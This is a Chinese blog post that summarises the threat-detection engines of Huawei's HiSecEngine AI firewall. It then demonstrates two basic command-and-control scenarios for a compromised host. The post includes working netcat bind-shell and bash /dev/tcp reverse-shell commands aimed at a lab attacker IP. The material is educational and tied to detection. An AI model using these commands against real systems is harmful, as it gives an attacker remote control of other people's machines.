最近被华为HiSecEngine[1] AI防火墙刷爆了朋友圈,它内置了三大威胁防御引擎,分别是NGE、CDE和AIE。以下是自己的理解,可能说的不对,欢迎留言讨论。

  • NGE:作为NGFW检测引擎,提供IPS、反病毒和URL过滤等内容安全相关的功能

大白话说:就是特征库检测

  • CDE:可提供数据深度分析,暴露威胁的细节,快速检测恶意文件

大白话说:就是沙箱检测

  • AIE:APT威胁检测引擎,针对暴力破解、C&C、DGA域名和加密威胁流量进行检测

大白话说:就是AI行为检测

对AIE引擎颇有兴趣,有监督的有3类:

  • 失陷主机检测:失陷后的行为比较诡异,可能C&C,也可能转移,不知道华为怎么定义?
  • C&C通道检测:失陷后为了维持权限,种下的后门程序,这是一个比较明确的突破口。
  • 加密外发检测:正在学习...

无监督的有1类:

  • 暴力破解检测:对RDP、SSH等流量进行K-Means聚类?

攻击矩阵:

信息收集、扫描探测、边界突破、建立驻点、权限提升、内部转移、数据盗取、数据外发。

入门级的C&C场景[2]

点个赞呗,待会来写高级部分

场景一:失陷主机在非军事区

  • 公网服务器失陷,攻击者成功入侵后,将bash发布出去,等待控制端来连接
nc -lvvp 2019 -t -e /bin/bash

  • 攻击者控制端(103),主动连接失陷服务器(105)
nc 192.168.0.105 2019

  • 此时,后门已经稳定建立了,失陷主机的2019端口一直打开着,任何人都能控制它

场景二:失陷主机在内网

  • 攻击者控制端(103)主动监听2019端口,等待失陷主机(105)来舔
nc -vlp 2019

  • 失陷主机(105)舔攻击者控制端(103)
bash -i >& /dev/tcp/192.168.0.103/2019 0>&1

  • 此时,后门已经稳定建立了,失陷主机(105)与攻击者(103)一直保持着连接

带货环节:

CC驻点你应该知道的事相关推荐

  1. APP推广前,你应该知道的事

    前言:随着中国互联网渗透率的逐步提高,中国广告主的广告投放重心逐渐向互联网迁移.互联网广告投放占比上升趋势明显.调查表明,随着用户逐步向移动端迁徙,广告主也正快速接受甚至追捧移动广告,广告主在移动端的 ...

  2. 比尔·盖茨:关于新冠疫苗你需要知道的事

    这些天我被问得最多的一个问题是:世界何时才能回到去年12月新冠病毒大流行之前的状态?我的答案始终如一:当我们得到一种近乎完美的特效药的时候,或者当地球上几乎所有人都接种了新冠疫苗的时候. 前者不太可能 ...

  3. 产品经理面试必须知道的事

    最近"产品经理面试太难了吧!"这句话一直在我耳边缠绕.其实我觉得还好吧,我只会觉得你可能是没技巧.下面金老师给大家分享一下字节跳动产品经理招聘的面试干货. 应该没有人不知道字节跳动 ...

  4. 大数据软件的真假分辨,消费者一定要知道的事!

    大数据软件的真假分辨,消费者一定要知道的事! 大数据时代,各种各样的新东西出现,让大家的生活都变的更便利,快捷了.但是一个新的好东西的出现,势必会引来大量的不良商家开始争相模仿.恶意竞争,打乱了市场动 ...

  5. “真希望我第一次创业时就知道的事”

    我们常常事后诸葛亮.当你回头看看之前做过的项目或努力,你总能更好地意识到什么事重要.什么事不重要. 在创业上也是一样的.在一项事业上奋斗了一两年或更多的时间后,你总能更好地意识到一些事是值得担心的,而 ...

  6. eBay跨境电商建议指南:eBay开店之前你就该知道的事

    做eBay跨境电商的卖家千千万万,到底要怎么做才能在这个平台大卖呢?这是东哥最近私信很多人都在问的一个问题,东哥作为eBay老鸟,不得不说在这个问题上真的有很多建议想跟新手卖家们提一提.所以今天东哥的 ...

  7. 入门深度学习?这里有5件你应该知道的事

    作者|PURVA HUILGOL 编译|Flin 来源|analyticsvidhya 开始你的深度学习生涯? 对于新手来说,深度学习是一个复杂而令人生畏的领域.像隐藏层.卷积神经网络.反向传播等概念 ...

  8. 串口,com口,ttl,max232你应该知道的事

    1 今天,说几个比较基础的知识,大家在开发过程中经常会遇到但是又不是特别注意的知识点. TTL电平: TTL是Transistor-Transistor Logic,即晶体管-晶体管逻辑的简称,它是计 ...

  9. 开口谈薪水前,你一定要知道的事!

    我想是因为自己是从事人力资源管理工作的缘故,朋友们都很习惯询问我关于转职相关的问题,最近身边有二位朋友不约而同地打算转职,然后再加上这个部落格接连地接到几位网友类似的询问,所以我想在此分享这个对很多人 ...

最新文章

  1. 设备树 xlnx-phy 使用
  2. sql 根据多个ID删除表中多行数据
  3. strace命令学习
  4. 基于ABP落地领域驱动设计-05.实体创建和更新最佳实践
  5. 抢先看!Kubernetes v1.21 新特性一览
  6. MySQL自用脚本(不定期更新)
  7. c语言机考答案,全国计算机等级考试C语言上机试题题库(内附答案)
  8. μC/OS-II实时性能测试与分析
  9. 为什么属龙的有二婚命_为什么属龙的有二婚命 一生婚姻运势详解
  10. linux 之 sed
  11. C# 入门(0807):流程控制
  12. NoSQLAttack针对 mongoDB 的攻击工具
  13. 错误: 实例 ruiy 执行所请求操作失败,实例处于错误状态。: 请稍后再试 [错误: #39;ascii#39; codec can#39;t decode byte 0xe6 in po...
  14. 踏上Oracle ebs的道路
  15. 高中生用台灯哪种好?2023最好的台灯品牌排行榜
  16. 2020 ACL《CoGAN》- Aspect Sentiment Classification with Document-level Sentiment Preference Modeling
  17. figma中文显示不出_我的figma愿望列出了2020年要构建的10个功能
  18. C语言:三色球问题:12个中3红3白6黑,取8个求共有多少种可能
  19. bit 和 byte 、kbyte
  20. oracle ORA-01704: string literal too long问题分析

热门文章

  1. win10找不到输入法问题的解决办法
  2. mysql 公历变农历_经过完整测试的农历-公历相互转换
  3. Spring Boot 整合163或者qq邮箱发送验证码
  4. 华三设备常用调试命令
  5. 【热门收藏】iOS开发人员必看的精品资料(100个)
  6. 线性回归分析——高尔顿数据集
  7. 自旋锁(spin lock)学习
  8. laravel常见错误(一):The page has expired due to inactivity. Please refresh and try again.
  9. 58同城、前程无忧在前,快手做招聘能否弯道超车?
  10. Java截取视频生成Gif动图